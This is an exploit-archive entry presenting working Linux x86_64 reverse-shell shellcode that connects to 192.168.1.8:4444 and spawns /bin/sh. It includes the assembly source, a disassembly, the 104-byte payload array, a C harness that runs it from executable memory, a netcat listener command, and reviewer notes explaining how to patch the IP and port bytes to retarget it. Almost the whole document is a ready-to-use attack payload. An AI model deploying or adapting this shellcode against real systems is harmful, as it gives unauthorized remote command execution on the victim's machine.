Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)
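/*
 * Category:     Shellcode
 * Title:        GNU/Linux x86_64 - Reverse Shell Shellcode (192.168.1.8:4444)
 * Author:       m4n3dw0lf
 * Github:       https://github.com/m4n3dw0lf
 * Date:         18/07/2017
 * Architecture: Linux x86_64
 * Tested on:    #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
 *
 * What the payload does, in order (raw Linux syscalls, no libc):
 *   1. socket(AF_INET, SOCK_STREAM, 0)
 *   2. connect(3, { AF_INET, htons(4444), 192.168.1.8 }, 16)
 *   3. dup2(3, 0); dup2(3, 1); dup2(3, 2)
 *   4. execve("//bin/sh", NULL, NULL)
 *
 * Reviewer notes. The assembly and the byte array were left exactly as
 * published so that the listing, the objdump and the C array agree
 * (104 bytes, 0x400080..0x4000e8). Things to be aware of before reuse:
 *   - The socket descriptor is hard-coded as 3 ("push 3 / pop rdi") instead
 *     of being taken from rax after sys_socket. This only works when fds
 *     0-2 are the only descriptors open in the target process.
 *   - The sockaddr_in is written 8 bytes below the original rsp and rsp is
 *     then moved back above it; the structure survives only because x86_64
 *     user space has a 128-byte red zone. The second 8 bytes (sin_zero)
 *     are whatever the later push/pop pairs leave on the stack; the kernel
 *     ignores sin_zero, so this is harmless but ugly.
 *   - No syscall return value is checked. If connect() fails, rax holds
 *     -errno, and "mov al, 33" only replaces the low byte, so the dup2 loop
 *     issues an invalid syscall number three times and /bin/sh is still
 *     spawned, with stdio left untouched (no shell reaches the listener).
 *   - "push rbp / mov rbp, rsp" and "pop rbx / xor rbx, rbx" do nothing
 *     useful here; they are dead bytes that could be dropped.
 *   - The payload contains a NUL byte (the high byte of sin_family in
 *     "\x02\x00\x11\x5c"), and more appear if any IP octet or port byte is
 *     zero. It is NOT suitable as-is for strcpy()-style injection sinks.
 *   - To retarget without reassembling: the port is bytes 27-28 of the
 *     array in network byte order (0x11 0x5c = 4444), and the IP octets are
 *     bytes 33-36 (0xc0 0xa8 0x01 0x08 = 192.168.1.8).
 *
 * ##########
 * # Source #
 * ##########
 *
 * section .text
 * global _start
 *
 * _start:
 *     push rbp                        ; prologue - unnecessary in shellcode
 *     mov  rbp, rsp
 *     xor  rdx, rdx                   ; protocol = 0
 *     push 1
 *     pop  rsi                        ; SOCK_STREAM
 *     push 2
 *     pop  rdi                        ; AF_INET
 *     push 41
 *     pop  rax                        ; sys_socket
 *     syscall                         ; rax = fd; assumed to be 3 below
 *     sub  rsp, 8
 *     mov  dword [rsp], 0x5c110002    ; sin_family=2, sin_port=htons(4444): bytes 02 00 11 5c
 *     mov  dword [rsp+4], 0x801a8c0   ; sin_addr=192.168.1.8: bytes c0 a8 01 08
 *     lea  rsi, [rsp]                 ; rsi -> sockaddr_in
 *     add  rsp, 8                     ; sockaddr now lives below rsp (red zone)
 *     pop  rbx                        ; dead: pops the saved rbp
 *     xor  rbx, rbx                   ; dead
 *     push 16
 *     pop  rdx                        ; addrlen = sizeof(struct sockaddr_in)
 *     push 3
 *     pop  rdi                        ; fd hard-coded as 3 (not taken from rax)
 *     push 42
 *     pop  rax                        ; sys_connect
 *     syscall                         ; return value never checked
 *     xor  rsi, rsi                   ; newfd = 0
 * shell_loop:
 *     mov  al, 33                     ; sys_dup2 - only the low byte of rax is set
 *     syscall                         ; dup2(3, rsi); rdi is preserved across syscall
 *     inc  rsi
 *     cmp  rsi, 2
 *     jle  shell_loop                 ; rsi = 0, 1, 2
 *     xor  rax, rax
 *     xor  rsi, rsi                   ; argv = NULL
 *     mov  rdi, 0x68732f6e69622f2f    ; "//bin/sh" (little-endian, no NUL in the immediate)
 *     push rsi                        ; NUL terminator
 *     push rdi
 *     mov  rdi, rsp                   ; rdi -> "//bin/sh\0"
 *     xor  rdx, rdx                   ; envp = NULL
 *     mov  al, 59                     ; sys_execve
 *     syscall
 *
 * #################################
 * # Compile and execute with NASM #
 * #################################
 *
 *   nasm -f elf64 reverse_tcp_shell.s -o reverse_tcp_shell.o
 *   ld reverse_tcp_shell.o -o reverse_tcp_shell
 *
 * #########################
 * # objdump --disassemble #
 * #########################
 *
 * reverse_tcp_shell:     file format elf64-x86-64
 * Disassembly of section .text:
 *
 * 0000000000400080 <_start>:
 *   400080: 55                         push   %rbp
 *   400081: 48 89 e5                   mov    %rsp,%rbp
 *   400084: 48 31 d2                   xor    %rdx,%rdx
 *   400087: 6a 01                      pushq  $0x1
 *   400089: 5e                         pop    %rsi
 *   40008a: 6a 02                      pushq  $0x2
 *   40008c: 5f                         pop    %rdi
 *   40008d: 6a 29                      pushq  $0x29
 *   40008f: 58                         pop    %rax
 *   400090: 0f 05                      syscall
 *   400092: 48 83 ec 08                sub    $0x8,%rsp
 *   400096: c7 04 24 02 00 11 5c       movl   $0x5c110002,(%rsp)
 *   40009d: c7 44 24 04 c0 a8 01 08    movl   $0x801a8c0,0x4(%rsp)
 *   4000a5: 48 8d 34 24                lea    (%rsp),%rsi
 *   4000a9: 48 83 c4 08                add    $0x8,%rsp
 *   4000ad: 5b                         pop    %rbx
 *   4000ae: 48 31 db                   xor    %rbx,%rbx
 *   4000b1: 6a 10                      pushq  $0x10
 *   4000b3: 5a                         pop    %rdx
 *   4000b4: 6a 03                      pushq  $0x3
 *   4000b6: 5f                         pop    %rdi
 *   4000b7: 6a 2a                      pushq  $0x2a
 *   4000b9: 58                         pop    %rax
 *   4000ba: 0f 05                      syscall
 *   4000bc: 48 31 f6                   xor    %rsi,%rsi
 *
 * 00000000004000bf <shell_loop>:
 *   4000bf: b0 21                      mov    $0x21,%al
 *   4000c1: 0f 05                      syscall
 *   4000c3: 48 ff c6                   inc    %rsi
 *   4000c6: 48 83 fe 02                cmp    $0x2,%rsi
 *   4000ca: 7e f3                      jle    4000bf <shell_loop>
 *   4000cc: 48 31 c0                   xor    %rax,%rax
 *   4000cf: 48 31 f6                   xor    %rsi,%rsi
 *   4000d2: 48 bf 2f 2f 62 69 6e 2f 73 68   movabs $0x68732f6e69622f2f,%rdi
 *   4000dc: 56                         push   %rsi
 *   4000dd: 57                         push   %rdi
 *   4000de: 48 89 e7                   mov    %rsp,%rdi
 *   4000e1: 48 31 d2                   xor    %rdx,%rdx
 *   4000e4: b0 3b                      mov    $0x3b,%al
 *   4000e6: 0f 05                      syscall
 *
 * #######################
 * # 104 Bytes Shellcode #
 * #######################
 *
 * Extracted from the object with:
 *
 *   for i in `objdump -d reverse_tcp_shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
 *
 * (That pipeline keeps every two-hex-digit token, so it would also pick up
 *  addresses or operands that happen to be exactly two hex digits; verify
 *  the result against sizeof(shellcode) - 1 == 104, which main() prints.)
 *
 * ########
 * # Test #
 * ########
 *
 * On the host that will receive the shell:
 *
 *   nc -vvlp 4444
 *
 * On the target machine (edit the IP/port bytes first, see above):
 *
 *   gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
 *   ./reverse_tcp_shell
 *
 * Note on the harness: the original called straight into the global array
 * and relied on -z execstack to make it executable. Recent x86_64 kernels
 * no longer apply READ_IMPLIES_EXEC to a process just because its stack is
 * marked executable, so a .data array is not executable and the call
 * faults. main() below therefore copies the bytes into an anonymous
 * PROT_EXEC mapping, which works with or without -z execstack (an SELinux
 * execmem policy may still deny the RWX mapping; if so, mmap() reports it).
 */
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* 104 bytes; see the listing above for the assembly it was built from. */
unsigned char shellcode[] =
    "\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58"
    "\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24"
    "\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31"
    "\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0"
    "\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48"
    "\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89"
    "\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";

/*
 * Test harness: report the payload size, copy the bytes into executable
 * memory and jump to them. The payload never returns on success (it
 * execve()s /bin/sh); the return 0 is only reached if the jump comes back,
 * which the published bytes never do.
 */
int main(void)
{
    size_t len = sizeof(shellcode) - 1;   /* drop the implicit NUL terminator */

    printf("Shellcode length: %zu bytes\n", len);
    /* The payload dup2()s the socket over fd 1; flush before stdout goes away. */
    fflush(stdout);

    void *exec_mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec_mem == MAP_FAILED) {
        perror("mmap(PROT_EXEC)");
        return 1;
    }
    memcpy(exec_mem, shellcode, len);

    /* void* -> function pointer is not ISO C, but POSIX/dlsym-style and
     * universally supported on Linux; same trick as the original harness. */
    ((void (*)(void))exec_mem)();
    return 0;
}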